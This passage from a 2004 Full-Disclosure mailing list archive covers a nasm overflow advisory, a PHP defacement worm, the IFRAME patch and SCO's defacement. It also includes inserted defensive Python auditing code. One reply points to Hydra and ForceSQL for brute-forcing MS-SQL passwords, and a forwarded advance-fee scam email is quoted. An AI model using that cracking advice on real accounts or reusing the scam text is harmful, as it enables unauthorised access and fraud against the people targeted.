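WEAK_CIPHER_MARKERS = ("-cbc", "arcfour", "3des", "blowfish", "cast128")


def parse_sshd_config(text: str) -> Dict[str, List[str]]:
    """Lower-cased keyword -> its arguments in file order."""
    cfg: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        keyword, _, argument = line.partition(" ")
        cfg.setdefault(keyword.lower(), []).append(argument.strip())
    return cfg


def audit_sshd_config(text: str) -> List[str]:
    """Findings for the settings discussed in the thread; empty list means clean."""
    cfg = parse_sshd_config(text)
    findings: List[str] = []

    def last(keyword: str, default: str) -> str:
        return cfg.get(keyword, [default])[-1]

    if "1" in last("protocol", "2").split(","):
        findings.append("SSH protocol 1 enabled")
    if last("port", "22") == "22":
        findings.append("listening on default port 22")
    if "ciphers" not in cfg:
        findings.append("Ciphers not pinned; server default list in effect")
    else:
        weak = [c for c in last("ciphers", "").split(",")
                if any(marker in c for marker in WEAK_CIPHER_MARKERS)]
        if weak:
            findings.append("weak ciphers offered: " + ",".join(weak))
    # An absent PermitRootLogin is not flagged: its default differs between releases.
    if last("permitrootlogin", "no").lower() == "yes":
        findings.append("PermitRootLogin yes")
    # PasswordAuthentication defaults to yes, so absence counts as a finding.
    if last("passwordauthentication", "yes").lower() == "yes":
        findings.append("PasswordAuthentication yes (default if unset)")
    return findings


if __name__ == "__main__":
    for label, config in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: {audit_sshd_config(config) or ['no findings']}")
```

Run against a real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; the port finding is the obscurity layer from the thread, the other four are the steps that have to hold regardless of which port the daemon listens on.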


RE: [Full-Disclosure] [USN-45-1] nasm vulnerability

2004-12-22 Thread Todd Towles
So now, I just need to trick a user into running a malicious source file
that I assembled and sent him, this makes it much harder.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Martin Pitt
 Sent: Wednesday, December 22, 2004 4:53 AM
 To: [EMAIL PROTECTED]
 Cc: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
 Subject: [Full-Disclosure] [USN-45-1] nasm vulnerability
 
 ===
 Ubuntu Security Notice USN-45-1 December 22, 2004
 nasm vulnerability
 CAN-2004-1287
 ===
 
 A security issue affects the following Ubuntu releases:
 
 Ubuntu 4.10 (Warty Warthog)
 
 The following packages are affected:
 
 nasm
 
 The problem can be corrected by upgrading the affected 
 package to version 0.98.38-1ubuntu0.1.  In general, a 
 standard system upgrade is sufficient to effect the necessary changes.
 
 Details follow:
 
 Jonathan Rockway discovered a locally exploitable buffer 
 overflow in the error() function of nasm. If an attacker 
 tricked a user into assembling a malicious source file, they 
 could exploit this to execute arbitrary code with the 
 privileges of the user that runs nasm.
 
   Source archives:
 
 
 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3
 8-1ubuntu0.1.diff.gz
   Size/MD5: 9013 69265719926bba4907e7da4df681324d
 
 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3
 8-1ubuntu0.1.dsc
   Size/MD5:  598 b160f2ca70fc5bd4021c1e6e526eaf70
 
 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3
 8.orig.tar.gz
   Size/MD5:   641727 9c1df91560651cbfaa73595fe6babb85
 
   amd64 architecture (Athlon64, Opteron, EM64T Xeon)
 
 
 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3
 8-1ubuntu0.1_amd64.deb
   Size/MD5:  1586664 2c76de8992b04548754487c9a2aa61dd
 
   i386 architecture (x86 compatible Intel/AMD)
 
 
 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3
 8-1ubuntu0.1_i386.deb
   Size/MD5:  1545538 a9c5d4e5a11f9c0c36a1deb5754eaf68
 
   powerpc architecture (Apple Macintosh G3/G4/G5)
 
 
 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3
 8-1ubuntu0.1_powerpc.deb
   Size/MD5:  1584374 540e0c417178d47713ca0cd60b7fc806
 



RE: [Full-Disclosure] RE: Cipher Tool

2004-12-22 Thread Todd Towles
You could set up a tunnel using Stunnel if you didn't want to use
SCP/SSH..but all are good ways of passing the file. Don't forget about
scripting GPG as well. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Ron DuFresne
 Sent: Wednesday, December 15, 2004 12:13 PM
 To: richard capistrano
 Cc: full-disclosure@lists.netsys.com
 Subject: Re: [Full-Disclosure] RE: Cipher Tool
 
 
 
 And the reasons that sending the file through an encrypted 
 tunnel, like scp/ssh is?
 
 Thanks,
 
 Ron DuFresne
 
 On Tue, 14 Dec 2004, richard capistrano wrote:
 
 
  Hello,
 
 
 
 
 
  We are looking for a tool that can actually cipher or hash 
 a particular portion of a file so that it will not display 
 the particular field of a file. This will be applied to the 
 file so that when it travels the network, the confidential 
 field in the file is not displayed in clear text. Due to 
 performance issues, we can not simply hash the whole file.
 
 
 
  Is there a freeware or software or information, I can check 
 out? Thanks in advance.
 
 
 
  -
  Do you Yahoo!?
   Read only the mail you want - Yahoo! Mail SpamGuard.
 
 --
 Sometimes you get the blues because your baby leaves you. 
 Sometimes you get'em 'cause she comes back. --B.B. King
 ***testing, only testing, and damn good at it too!***
 
 OK, so you're a Ph.D.  Just don't touch anything.
 
 
 



RE: [Full-Disclosure] Possible apache2/php 4.3.9 worm

2004-12-21 Thread Todd Towles
There were several serious holes just released in 4.3.9 of PHP. That is
a possible attack vector from what you are saying. Get 4.3.10 of PHP for
sure. As far as what this does or what all it would do, someone needs to
get a good catch of it.

Anyone ready to set up a box? =) 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Alex Schultz
 Sent: Tuesday, December 21, 2004 9:32 AM
 To: full-disclosure@lists.netsys.com
 Cc: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Possible apache2/php 4.3.9 worm
 
 Some of the sites I administer were allegedly hit by a worm 
 last night.
 It overwrote all .php/.html files that were owner writable 
 and owned by apache.  The worm put the following html in 
 place of what was there:
 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML> 
 <HEAD> <TITLE>This site is defaced!!!</TITLE> </HEAD> <BODY 
 bgcolor=#00 text=#FF> <H1>This site is 
 defaced!!!</H1> <HR> <ADDRESS><b>NeverEverNoSanity WebWorm 
 generation 17.</b></ADDRESS> </BODY> </HTML>
 
 We were running apache 2.0.52 and php 4.3.9. Have any of you 
 encountered this before?  Also is there anything I should be 
 aware of such as a possible binary that may have been 
 dropped?  Could this have been accomplished by the upload path 
 traversal vulnerability?  Google returns nothing.
 
 
 Thanks
 -Alex Schultz
 
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
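An added example, not from the thread or from anyone on it: a small audit of a web root for the two things Alex describes, files carrying the defacement marker and files the web server account could have overwritten (owner-writable), plus a hash baseline taken while the tree is known-good so that a changed file is reported as changed rather than merely suspected. The marker string is taken from the quoted defacement page; the web root layout and the sample files in demo() are constructed. The ownership condition (files owned by apache) is left out because reproducing it needs root to chown; in production, compare st_uid against the web server's uid in the same loop.

```python
import hashlib
import os
import stat
import tempfile

# Added example, not part of the original thread. Marker copied from the
# defacement page quoted above; everything else is constructed.
DEFACEMENT_MARKER = b"NeverEverNoSanity WebWorm"
WEB_EXTENSIONS = (".php", ".html", ".htm")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def web_files(root):
    """Yield (relative path, absolute path) for every web file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTENSIONS):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root), full


def baseline(root):
    """Snapshot to take while the tree is known-good: relative path -> sha256."""
    return {rel: sha256_of(full) for rel, full in web_files(root)}


def audit_webroot(root, known_good=None, marker=DEFACEMENT_MARKER):
    """Return {relative_path: [finding, ...]} for every suspicious web file."""
    findings = {}
    for rel, full in web_files(root):
        issues = []
        with open(full, "rb") as fh:
            if marker in fh.read():
                issues.append("defacement-marker")
        # Owner-writable is the precondition the poster gives for the
        # files the worm could overwrite (owned by apache and writable).
        if os.stat(full).st_mode & stat.S_IWUSR:
            issues.append("owner-writable")
        if known_good is not None:
            if rel not in known_good:
                issues.append("not-in-baseline")
            elif known_good[rel] != sha256_of(full):
                issues.append("changed-since-baseline")
        if issues:
            findings[rel] = issues
    return findings


def demo():
    """Constructed web root: one read-only page, one page overwritten
    after the baseline was taken (sample data, not a real site)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    index = os.path.join(root, "index.php")
    about = os.path.join(root, "about.html")
    with open(index, "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>\n")
    with open(about, "wb") as fh:
        fh.write(b"<html><body>About us</body></html>\n")
    os.chmod(index, 0o444)  # not writable by its owner
    os.chmod(about, 0o644)  # owner-writable, the condition from the thread
    snapshot = baseline(root)
    with open(about, "wb") as fh:  # simulate the overwrite described above
        fh.write(b"<H1>This site is defaced!!!</H1>"
                 b"<ADDRESS><b>NeverEverNoSanity WebWorm generation 17.</b></ADDRESS>")
    return audit_webroot(root, snapshot)


if __name__ == "__main__":
    for path, issues in sorted(demo().items()):
        print(path, ", ".join(issues))
```

The baseline is only worth what its storage is worth: keep it off the web server (or on read-only media), since a process that can overwrite the pages can overwrite a baseline sitting next to them.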


RE: [Full-Disclosure] RE: Cipher Tool

2004-12-20 Thread Todd Towles
Or you could go buy some of these and link them together to reach over a
distance.

The First Commercial Quantum Cryptography solution - encryption per
photon =)
 http://www.magiqtech.com/index.php

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of James Tucker
 Sent: Wednesday, December 15, 2004 10:38 PM
 To: richard capistrano
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] RE: Cipher Tool
 
 Have you considered using secured network protocols on 
 dedicated encryption hardware? or is that beyond the price point?
 
 Any cipher algorithm would be theoretically implementable 
 (providing the length of data is suitable). If you are 
 looking for _real_ performance though then ciphering may not 
 be what you want as there isn't any good cipher that is 
 really overly fast fast (deliberate double).
 
 There are other core pieces of the puzzle to be considered 
 though, like are you going to be talking in a client less 
 manner (i.e. is the client pre-configured or has the client 
 never received secure comms
 before?) Is there a socket/tunnel already running? What is 
 the rough length of the data set (impact readability and 
 suitability for encryption algorithms)? What is the 
 performance restriction (i.e.
 where is the bottleneck)? How secure do you need it, 
 anti-fool, seconds, hours, years or millennial(might actually 
 require more data storage than money can buy)?
 
 I raised an eyebrow at the last portion of your mail, "Is 
 there a freeware or software or information, I can check 
 out?". This would suggest that you are looking to put another 
 program somewhere mid-flow in a data pipe; that's not always a 
 good option.
 
 If you're really looking for speed and ease of implementation 
 then something like a simple rotation cipher might work out 
 for you, but this is going to be so poor an encryption that 
 some cipher pros could read it in its encrypted form. This 
 is obviously no good if you're worried about credit card 
 info, but is OK if it's just your girlfriend being a nosy ... .
 
 
 On Tue, 14 Dec 2004 00:23:41 -0800 (PST), richard capistrano 
 [EMAIL PROTECTED] wrote:
   
   
  
  Hello,
  

  

  
  We are looking for a tool that can actually cipher or hash a 
  particular portion of a file so that it will not display the 
  particular field of a file. This will be applied to the 
 file so that 
  when it travels the network, the confidential field in the 
 file is not 
  displayed in clear text. Due to performance issues, we can 
 not simply hash the whole file.
  

  
  Is there a freeware or software or information, I can check out? 
  Thanks in advance.
  
   
  Do you Yahoo!?
   Read only the mail you want - Yahoo! Mail SpamGuard. 
  
  
  
  
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
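For the question raised in both Cipher Tool threads above (protecting one confidential field of a file without ciphering the whole file), here is an added example that is not from either thread or from any of the posters. It rewrites a single CSV column with a keyed HMAC-SHA256 token and leaves every other column, and the rest of the file, untouched. A keyed construction is used rather than a plain hash because a card number or account identifier has so little entropy that a plain digest can be matched against enumerated candidates; with an HMAC the observer also needs the key. The key, the column name and the records are constructed samples; in practice the key comes from a key store, never from the file or the code. If the receiver must recover the original value rather than just match against it, the per-field structure stays the same but the HMAC is replaced by authenticated encryption (AES-GCM from a cryptography library, which is not in the Python standard library).

```python
import csv
import hashlib
import hmac
import io

# Added example, not from the Cipher Tool threads. The key below is a
# constructed 32-byte sample; a real deployment loads it from a key store.
FIELD_KEY = bytes.fromhex(
    "6b3a1f9c2e8d4b7a5c1e0f2d3b4a5968"
    "7c8d9e0f1a2b3c4d5e6f708192a3b4c5"
)


def protect_field(value, key=FIELD_KEY):
    """Keyed, fixed-length token for one confidential field value."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()


def protect_csv(text, column, key=FIELD_KEY):
    """Rewrite CSV text so that `column` carries a token instead of plaintext.

    Only the named column is touched, so the cost is one HMAC per record
    rather than a pass over the whole file's content.
    """
    reader = csv.DictReader(io.StringIO(text))
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=reader.fieldnames)
    writer.writeheader()
    for row in reader:
        row[column] = protect_field(row[column], key)
        writer.writerow(row)
    return out.getvalue()


def matches(token, candidate, key=FIELD_KEY):
    """Constant-time check of a candidate plaintext against a stored token."""
    return hmac.compare_digest(token, protect_field(candidate, key))


# Constructed sample records; the account numbers are test values.
SAMPLE_CSV = (
    "id,name,account\n"
    "1,Alice,4111111111111111\n"
    "2,Bob,5500000000000004\n"
)


def demo():
    """Protect the sample file and parse the result back for inspection."""
    protected = protect_csv(SAMPLE_CSV, "account")
    rows = list(csv.DictReader(io.StringIO(protected)))
    return protected, rows


if __name__ == "__main__":
    protected, rows = demo()
    print(protected)
    print("lookup ok:", matches(rows[0]["account"], "4111111111111111"))
```

Two properties to keep in mind when choosing this over encryption: the token is deterministic, so equal plaintexts give equal tokens (which is what makes lookups work, and also what makes records linkable), and it is one-way, so the receiver can verify a value but never read it back.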


RE: [Full-Disclosure] A suggestion to all AV vendors...

2004-12-07 Thread Todd Towles
Not exactly true..it is called freedom...drinking is bad for you when
you take too much..but so are some vitamins when you take too
much...let the government tax cigs; if you don't want to pay the tax,
don't buy them. Again we are way OT.

Never go to excess, but let moderation be your guide. 
Cicero (106 BC - 43 BC) 

Water, taken in moderation, cannot hurt anybody. 
Mark Twain (1835 - 1910) 

-Todd

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Kenneth Ng
 Sent: Tuesday, December 07, 2004 11:34 AM
 To: [EMAIL PROTECTED]
 Cc: bipin gautam; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] A suggestion to all AV vendors...
 
 If you want an analogy, note that the US government says that 
 smoking is bad for you.  Yet, they won't ban smoking.  Why?  
 All the revenue they get from taxing cigarettes.
 
 
 On Tue, 07 Dec 2004 10:50:11 -0500, [EMAIL PROTECTED] 
 [EMAIL PROTECTED] wrote:
  On Mon, 06 Dec 2004 19:29:26 PST, bipin gautam said:
  
 A simple yet effective solution would be, for AV vendors to 
   (say) add the vulnerable system dll's, executables etc... in a 
   threat list (Referring to Microsoft's KB or something similar) And 
   after completing the virus scan, suggest the users to download 
   proper patches according to threat level and directing the end 
   users towards  proper link to do so?
  
  Simple, effective, and Won't Happen In Our Lifetime.
  
  Remember - we're talking about a multi-billion dollar 
 market segment 
  devoted to fixing shortcomings in another company's software.  And 
  said segment doesn't want to kill the goose that laid the 
 golden eggs.
  
  Repeat after me:  Most A/V vendors don't actually give a 
 squat about 
  your security.  They are there to sell you products and 
 improve their 
  bottom line, not yours.  They don't care about your bottom line as 
  long as your bottom line can still pay their invoices.
  
  The A/V vendors have known for several years now exactly how not to 
  send a virus was cleaned from your email by ShinyAV spam, 
 but they 
  keep doing it anyhow, just to get brainshare for ShinyAV.  What 
  business case is there for them to give you a pointer to vendor 
  patches that will close some of the holes that let the malware in?
  
  (Also, keep in mind that if they don't point you at IE fixes, then 
  when you get 0wned by an IE hole, they can just say Hey, 
 that's not a 
  virus, that's an IE hole, Not Our Problem...)
  
  
 
 
 



RE: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly

2004-12-02 Thread Todd Towles
As stated in the FAQ of the patch page, it would appear the new baseline
for all future patches will be SP1 unless they decide to change it.


 I am still using Windows XP, but extended security update support ended
on September 30th, 2004. What should I do?

The original version of Windows XP, commonly referred to as Windows XP
Gold or Windows XP Release to Manufacturing (RTM) version, reached the
end of its extended security update support life cycle on September
30th, 2004. 

It should be a priority for customers who have these operating system
versions to migrate to supported versions to prevent potential exposure
to future vulnerabilities. For more information about the Windows
Product Life Cycle, visit the Microsoft Support Lifecycle Web site. For
more information about the extended security update support period for
these operating system versions, visit the Microsoft Product Support
Services Web site.

Customers who require additional support for Windows XP RTM must contact
their Microsoft account team representative, their Technical Account
Manager, or the appropriate Microsoft partner representative for custom
support options. Customers without an Alliance, Premier, or Authorized
Contract can contact their local Microsoft sales office. For contact
information, visit the Microsoft Worldwide Information Web site, select
the country, and then click Go to see a list of phone numbers. When you
call, ask to speak with the local Premier Support sales manager.

For more information, see the Windows Operating System FAQ.




 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of BillyBob
 Sent: Thursday, December 02, 2004 7:07 AM
 To: Berend-Jan Wever; [EMAIL PROTECTED]; 
 [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Official IFRAME patch - make 
 sure it installs correctly
 
 Does anyone know why Microsoft does not have this patch 
 available for XP (no
 SP) running IE6 ?
 I know this system is vulnerable to the IFRAME exploit as I tested it.
 
 Bill
 
 - Original Message -
 From: Berend-Jan Wever [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Sent: Wednesday, December 01, 2004 8:49 PM
 Subject: [Full-Disclosure] Official IFRAME patch - make sure 
 it installs correctly
 
 
  The IFRAME vulnerability has been patched, see
 http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx
 
  *** Make sure you are patched after installing *** I installed it 
  using Automatic Updates (on Win2ksp4), rebooted and
 loaded my InternetExploiter.html: IT STILL WORKED!!
  Even though both Automatic Updates and
 http://windowsupdate.microsoft.com; reported that I was patched!?!
  I manually downloaded the exe and ran it, rebooted and now 
 I'm finally
 truly patched.
 
  It might just have been a glitch on my system, but you might wanna 
  check
 anyway: InternetExploiter.html can still be downloaded from 
 my website.
 
  Berend-Jan Wever
  [EMAIL PROTECTED]
  http://www.edup.tudelft.nl/~bjwever
  SkyLined in #SkyLined on EFNET
 
 
 
 
 



RE: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly

2004-12-02 Thread Todd Towles
I fully understand that Nick. I am a former SMS admin and had to deal
with this fact in a corporate patch environment. 

I was helping a person that didn't understand how Microsoft uses the
baseline for patching systems. I believe you looked a bit too deep into
my mail or liked to assume I was a patch n00b. Which is not the case.

And SP1 became the new baseline after Windows XP gold lost its
extended support. Just like SP2 will become the new baseline once SP1
passes its extended support. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Nick FitzGerald
 Sent: Thursday, December 02, 2004 2:18 PM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Official IFRAME patch - make 
 sure it installs correctly
 
 Todd Towles wrote:
 
  As stated in the FAQ of the patch page. It would appear the new 
  baseline for all future patches will be SP1 unless they 
 decided to change it.
 
 New?
 
 There is nothing new about this.  It has been standard MS 
 policy for many years now to only support the two most recent 
 releases of an OS, thus when Gold and SP1 are the only 
 versions, all versions are supported, but once SP2 ships, 
 the Gold release for that OS drops off the supported list.
 
 There is nothing new about this at all.
 
 
 Regards,
 
 Nick FitzGerald
 
 



RE: [Full-Disclosure] Is www.sco.com hacked?

2004-11-29 Thread Todd Towles
Hacked by realloc() - Check out the Zone-H.org link. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Cedric Blancher
 Sent: Monday, November 29, 2004 7:52 AM
 To: Rossen Naydenov
 Cc: Full Disclosure
 Subject: Re: [Full-Disclosure] Is www.sco.com hacked?
 
 Le lundi 29 novembre 2004 à 14:58 +0200, Rossen Naydenov a écrit :
  I just noticed the banner on www.sco.com If you didn't see 
 it( because 
  it is removed) this is what they say:
  We own all your code
  pay us all your money
  Or is it some commercial trick?
 
 The "Hacked by something I can't read" the girl in 
 background is writing definitely can't be some commercial trick ;)
 
 
 --
 http://www.netexit.com/~sid/
 PGP KeyID: 157E98EE FingerPrint: 
 FA62226DA9E72FA8AECAA240008B480E157E98EE
  Hi! I'm your friendly neighbourhood signature virus.
  Copy me to your signature file and help me spread!
 
 



RE: Fwd: [Full-Disclosure] University Researchers Challenge Bush Win In Florida

2004-11-29 Thread Todd Towles
Well thanks for trying to pull it off the list...lol 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of bkfsec
 Sent: Monday, November 29, 2004 2:49 PM
 To: Thomas Sutpen
 Cc: [EMAIL PROTECTED]
 Subject: Re: Fwd: [Full-Disclosure] University Researchers 
 Challenge Bush Win In Florida
 
 I wanted to make sure that everybody else has a chance to 
 view my remarks to Thomas' obviously unintelligible gripe 
 with me, while we're being immature and foolish here.  Why 
 break the chain, right?
 
 Thomas, if you're going to pick a fight, please pick one you 
 can handle with a modicum of grace.  I tried to take this 
 offlist, but you insist on dragging it back on... very sad. 
 
 Maybe you feel that your non-argument with regard to me can 
 only be bolstered by slanderous personal attacks.  I can play 
 that game, too.  
 Have a nice day.  :)
 
 
 Thomas Sutpen wrote:
 
 I forgot to make sure everybody else has a chance to view my remarks
 to Barry's obviously short-sighted arguments.
 
 
 -- Forwarded message --
 From: Thomas Sutpen [EMAIL PROTECTED]
 Date: Wed, 24 Nov 2004 14:31:49 -0700
 Subject: Re: [Full-Disclosure] University Researchers Challenge Bush
 Win In Florida
 To: bkfsec [EMAIL PROTECTED]
 
 
 On Wed, 24 Nov 2004 11:02:41 -0500, bkfsec 
 [EMAIL PROTECTED] wrote:
   
 
 So anyone who is concerned about the system and has shown that they
 aren't on your side of the political fence should have their opinion
 summarily tossed out?
 
 
 
 I never said what side of the fence I'm on.  You, however, have made
 it more than amply clear where you are.  You've already shown your
 hand, and like it or not, you'll be labelled accordingly.
   
 
 You seem to be ashamed of who you are.  That's a pity.  :)
 
 Label me however you like.  I really could care less.  I've shown my 
 hand? :)  That's pretty funny.
 
   
 
 Well, since you so clearly have shown your own allegiance, 
 wouldn't the
 case be the same for you?  Thanks for the opening.
 
 Everyone, please disregard Thomas' opinions - he's shown 
 himself to not
 be impartial.
 
 
 
 This coming from you.  Sorry, that doesn't wash.
 
   
 
 Sure it washes.  In fact, it washes so much that the irony of 
 my sarcasm 
 was entirely lost on you.
 
 Pity... maybe you should read a little bit more closely next time.  I 
 can talk to some people and maybe recommend a remedial level reading 
 class for you.  I'd have to look pretty far, though - no one 
 I know does 
 such a poor job as to require the remedial class you seem to need.
 
  -Barry
 
 
 



RE: [Full-Disclosure] Is www.sco.com hacked?

2004-11-29 Thread Todd Towles
.15 is dramatic? I mean Microsoft went up .17 today.. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Jason Coombs
 Sent: Monday, November 29, 2004 11:04 AM
 To: Cedric Blancher
 Cc: Rossen Naydenov; Full Disclosure
 Subject: Re: [Full-Disclosure] Is www.sco.com hacked?
 
 Cedric Blancher wrote:
  The "Hacked by something I can't read" the girl in background is 
  writing definitely can't be some commercial trick ;)
 
 Think not?
 
 Then how do you explain the dramatic increase in the market 
 value of SCOX?
 
 http://quotes.nasdaq.com/asp/summaryquote.asp?symbol=SCOX%60s
 elected=SCOX%60
 
 Regards,
 
 Jason Coombs
 [EMAIL PROTECTED]
 
 



RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam

2004-11-26 Thread Todd Towles
Yeah the last time I can remember that someone tried that on FD, was
that some so-called exploit that had an IRC trojan in it...it was discovered
after about 5 secs..lol 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Ron
 Sent: Friday, November 26, 2004 12:40 PM
 To: n3td3v
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Mailing lists and 
 unsolicited/malicious spam
 
 One thing to note, however, is that people who post on this 
 list would tend to be the ones who know better than to listen 
 to spam or to open viruses or to help out those poor old 
 Nigerian Diplomats.
 
 
 n3td3v wrote:
 
 How many people are actually subscribed (on FD) and what are the 
 general figures for subscribers for high profile mailing 
 lists, has any 
 figures ever been released? And would the theft of the list 
 of e-mails 
 subscribed be of value to spammers? I think it would be, I hope FD 
 admin is up to date with and keeping tracks of bugs as the 
 rest of us. 
 If malicious hackers/script kiddies got hold of the list, I 
 think they 
 would be able to attack a good percentage of inboxes with 
 whatever they 
 send. Whether it be porn spam or a phishing to take 
 passwords or if it 
 be malicious code to take advantage of POP mail clients via SMTP.
 
 I think already FD is targeted by spam/phishing hackers who wish to 
 collect e-mail addresses for further exploration. Perhaps 
 posting on FD 
 could be a security risk in itself (well not just FD but 
 mailing lists 
 online in general) as far as POP mail clients and SMTP is concerned. 
 (web-based e-mail has its own problems which usually don't have the 
 risk of taking over computers like mail clients do. Usually 
 web-based 
 e-mail is just at risk from xss/cookie disclosure/account theft, 
 whereas malicious code sent to mail clients can take over whole 
 computer systems)
 
 For those of you who already have a mailing list only 
 e-mail address 
 and a separate address for work related/corporate/company 
 matters, do 
 you see a different level of unsolicited spam, compared to the work 
 address or other private e-mail address for friends and family? I'm 
 thinking about setting up the same myself, just for experimental 
 reasons! I think i'll find some differences between the two.
 
 Sorry if you don't care about anti-spam, but it's something I'm 
 interested in. Sorry to all the script kiddie hax0rs who 
 don't like me 
 working against you and your e-mail collecting bots!
 
 Plus, do FD admin and other high profile mailing lists have 
 honey pots 
 or similar methods to catch FD/mailing list born spam? I 
 believe a big 
 mailing list can have its own domestic/internal spam, 
 separate from the 
 general internet who are not subscribed to the given mailing list or 
 lists, and even different mailing lists having its own group of 
 spammers targeting them, with its own nature of spam/phish/malicious 
 code exploration.
 
 Thanks,
 n3td3v
 
 
 
   
 
 
 



RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam

2004-11-26 Thread Todd Towles
Well, you know...most normal users don't know what an exploit is, they
would never know what FD is..lol

But you are right..I was going easy on the n00bs. ;) 

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
 Sent: Friday, November 26, 2004 2:14 PM
 To: Todd Towles
 Cc: n3td3v; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Mailing lists and 
 unsolicited/malicious spam 
 
 On Fri, 26 Nov 2004 08:13:47 CST, Todd Towles said:
 
  Number 1, I highly doubt that a spam message would be very 
 effective 
  using the FD list of addresses only. Number 2, this list is full of 
  security professionals (white, black and grey) and I would 
 guess that 
  most of the core users you see on here would not just run an 
 attachment 
  or be fooled by the double extensions trick. Given there 
 most likely 
  are normal internet users on this list but I would guess 
 that number 
  is pretty low.
 
 Might want to re-think that number 2, based on how many 
 people complain about viruses and malware posted to the list
 
 :)
 



RE: [Full-Disclosure] John the Ripper MS-SQL patch

2004-11-25 Thread Todd Towles
I haven't seen a patch that makes John capable of this, but I guess it
wouldn't be impossible.

You can look at ForceSQL v2.0 and Hydra. Hydra is put out by THC and
should be able to do what you want John to do for you.

-Todd

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Calum Power
 Sent: Thursday, November 25, 2004 2:32 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] John the Ripper MS-SQL patch
 
 G'day list,
 
 I was just wondering if anyone had heard of/written a patch 
 for John the Ripper which makes it possible to brute-force 
 MS-SQL password hashes.
 
 Cheers,
 Calum
 
 --
 Calum Power
 - Cultural Jammer
 - Security Enthusiast
 - Hopeless Cynic
 [EMAIL PROTECTED]
 http://www.fribble.net
 
 



RE: [Full-Disclosure] Fwd: Hi, It's Me !!!!!

2004-11-25 Thread Todd Towles
Could you please not forward your spam to the list. This is a 411
scam...if you don't know what that is..then please contact this person
and talk to him.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 john morris
 Sent: Thursday, November 25, 2004 7:00 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Fwd: Hi, It's Me !
 
 -- Forwarded message --
 From: [EMAIL PROTECTED] [EMAIL PROTECTED]
 Date: Wed, 24 Nov 2004 21:08:16 -0800
 Subject: Hi, It's Me !
 To: 
 
 
 FROM THE DESK OF BARRISTER. Wisdom Joshua (ESQ).
 
 Dear,
 
 I am Wisdom Joshua Esq., a Senior Advocate of Nigeria . I am 
 the legal Representative to Mr. Harold Lebron, a national of 
 your country, who used to work with Shell Development Company 
 in Nigeria. Hereinafter he shall be referred to as my client.
 
 On the 21st of April 2001, my client, his wife and their only 
 daughter were involved in a fire outbreak in their residence. 
 All of the family members unfortunately lost their lives. 
 Since then I have made several enquiries to your embassy here 
 to locate any of my client's extended relatives; this has also 
 proved unsuccessful. After these several unsuccessful 
 attempts, I decided to track his closest relations over the 
 Internet, hence I contacted you.
 
 I have contacted you to assist in returning the fund valued 
 at 16,000,000.00 USD left behind by my client before it gets 
 confiscated or declared unserviceable by the Vault Company or 
 Managers where this huge amount were Lodged. The said Finance 
